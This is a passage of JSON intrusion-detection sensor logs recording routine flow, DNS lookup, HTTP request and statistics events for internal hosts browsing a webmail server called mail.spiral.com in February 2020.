Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5266}} {"timestamp":"2020-02-29T00:04:53.000550+0000","flow_id":374678625694270,"event_type":"flow","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":19,"bytes_toserver":3294,"bytes_toclient":16546,"start":"2020-02-29T00:03:47.569918+0000","end":"2020-02-29T00:03:52.855546+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:04:53.000773+0000","flow_id":1505212802246177,"event_type":"flow","src_ip":"192.168.10.81","src_port":52674,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:03:47.828961+0000","end":"2020-02-29T00:03:52.835319+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:54.000206+0000","event_type":"stats","stats":{"uptime":13946,"capture":{"kernel_packets":133299,"kernel_drops":0},"decoder":{"pkts":133314,"bytes":92322649,"invalid":181,"ipv4":131873,"ipv6":8,"ethernet":133314,"raw":0,"null":0,"sll":0,"tcp":126800,"udp":4878,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2696,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2712,"synack":2703,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1739,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2224,"failed_udp":109},"tx":{"http":4514,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2301}},"flow_mgr":{"closed_pruned":2675,"new_pruned":15,"est_pruned":2260,"bypassed_pruned":0,"flows_checked":2,"
flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24139,"memcap_state":0,"memcap_global":0},"http":{"memuse":56764,"memcap":0}}} {"timestamp":"2020-02-29T00:04:55.334911+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5266},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21568,"tx_id":0}} {"timestamp":"2020-02-29T00:04:56.000454+0000","flow_id":1166765069131310,"event_type":"flow","src_ip":"192.168.10.122","src_port":33141,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:59:55.351790+0000","end":"2020-02-28T23:59:55.457599+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:57.000258+0000","flow_id":289883071232958,"event_type":"flow","src_ip":"192.168.10.122","src_port":59034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:56.375742+0000","end":"2020-02-28T23:59:56.487105+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:04:59.000659+0000","flow_id":1802819661102183,"event_type":"flow","src_ip":"192.168.10.122","src_port":33902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:59:58.359527+0000","end":"2020-02-28T23:59:58.464835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:59.384895+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23764,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:59.493660+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38736,"proto":"UDP","dns":{"type":"answer","id":23764,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:59.493660+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38736,"proto":"UDP","dns":{"type":"answer","id":23764,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:59.622045+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7683}} 
{"timestamp":"2020-02-29T00:05:00.000493+0000","flow_id":1754728927280743,"event_type":"flow","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:03:47.409191+0000","end":"2020-02-29T00:03:59.345249+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:01.000179+0000","event_type":"stats","stats":{"uptime":13953,"capture":{"kernel_packets":133316,"kernel_drops":0},"decoder":{"pkts":133318,"bytes":92322961,"invalid":181,"ipv4":131877,"ipv6":8,"ethernet":133318,"raw":0,"null":0,"sll":0,"tcp":126802,"udp":4880,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2696,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2712,"synack":2703,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1739,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2224,"failed_udp":110},"tx":{"http":4514,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2301}},"flow_mgr":{"closed_pruned":2677,"new_pruned":15,"est_pruned":2262,"bypas
sed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23478,"memcap_state":0,"memcap_global":0},"http":{"memuse":125401,"memcap":0}}} {"timestamp":"2020-02-29T00:05:02.000756+0000","flow_id":387009461891405,"event_type":"flow","src_ip":"192.168.10.122","src_port":46406,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:00.930125+0000","end":"2020-02-29T00:00:01.041456+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:03.000230+0000","flow_id":1136275096733977,"event_type":"flow","src_ip":"192.168.10.122","src_port":35290,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:02.592153+0000","end":"2020-02-29T00:00:02.697211+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:03.919178+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7683},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":41495,"tx_id":0}} 
{"timestamp":"2020-02-29T00:05:03.934083+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54065,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44365,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:04.042931+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54065,"proto":"UDP","dns":{"type":"answer","id":44365,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:04.042931+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54065,"proto":"UDP","dns":{"type":"answer","id":44365,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:04.149827+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5174}} {"timestamp":"2020-02-29T00:05:04.179927+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5174},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":24573,"tx_id":1}} {"timestamp":"2020-02-29T00:05:04.194971+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":704}} {"timestamp":"2020-02-29T00:05:04.196998+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":704},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2070,"tx_id":2}} {"timestamp":"2020-02-29T00:05:04.222557+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/list.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":611}} {"timestamp":"2020-02-29T00:05:04.225081+0000","flow_id":1750343770728430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:05:04.223946+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/list.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":611},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/js\/list.js","state":"CLOSED","stored":false,"size":1658,"tx_id":3}} {"timestamp":"2020-02-29T00:05:04.224524+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/mnemo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":397}} {"timestamp":"2020-02-29T00:05:04.225825+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/mnemo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":397},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/mnemo.png","state":"CLOSED","stored":false,"size":397,"tx_id":4}} {"timestamp":"2020-02-29T00:05:04.269330+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-000.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":240}} {"timestamp":"2020-02-29T00:05:04.306330+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-000.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":240},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-000.png","state":"CLOSED","stored":false,"size":240,"tx_id":5}} {"timestamp":"2020-02-29T00:05:04.306764+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:05:05.001844+0000","flow_id":1193329442411942,"event_type":"flow","src_ip":"192.168.10.122","src_port":35660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:03.906662+0000","end":"2020-02-29T00:00:04.012140+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:06.000219+0000","flow_id":290368418484945,"event_type":"flow","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1083,"bytes_toclient":709,"start":"2020-02-29T00:04:00.070353+0000","end":"2020-02-29T00:04:05.216909+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:05:07.000500+0000","flow_id":223959634101441,"event_type":"flow","src_ip":"192.168.10.130","src_port":34724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1291,"bytes_toclient":7935,"start":"2020-02-29T00:03:59.345281+0000","end":"2020-02-29T00:04:06.663673+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:07.362761+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37139,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64893,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:07.471041+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37139,"proto":"UDP","dns":{"type":"answer","id":64893,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:07.471041+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37139,"proto":"UDP","dns":{"type":"answer","id":64893,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:07.707629+0000","flow_id":579007405056244,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6129}} {"timestamp":"2020-02-29T00:05:08.000161+0000","event_type":"stats","stats":{"uptime":13960,"capture":{"kernel_packets":133341,"kernel_drops":0},"decoder":{"pkts":133370,"bytes":92349561,"invalid":181,"ipv4":131929,"ipv6":8,"ethernet":133370,"raw":0,"null":0,"sll":0,"tcp":126850,"udp":4884,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2698,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2714,"synack":2705,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1741,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2226,"failed_udp":110},"tx":{"http":4522,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2303}},"flow_mgr":{"closed_pruned":2679,"new_pruned":15,"est_pruned":2266,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23147,"memcap_state":0,"memcap_global":0},"http":{"memuse":160851,"memcap":0}}} 
{"timestamp":"2020-02-29T00:05:09.227475+0000","flow_id":1750343770728430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":0}} {"timestamp":"2020-02-29T00:05:09.311665+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":6}} {"timestamp":"2020-02-29T00:05:10.000306+0000","flow_id":1310461790902159,"event_type":"flow","src_ip":"192.168.10.122","src_port":44297,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:09.579471+0000","end":"2020-02-29T00:00:09.690288+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:05:12.708607+0000","flow_id":579007405056244,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6129},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30702,"tx_id":0}} {"timestamp":"2020-02-29T00:05:13.000243+0000","flow_id":2128300873612889,"event_type":"flow","src_ip":"192.168.10.122","src_port":33617,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:11.917081+0000","end":"2020-02-29T00:00:12.027870+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:13.280490+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46499,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34980,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:13.388520+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46499,"proto":"UDP","dns":{"type":"answer","id":34980,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
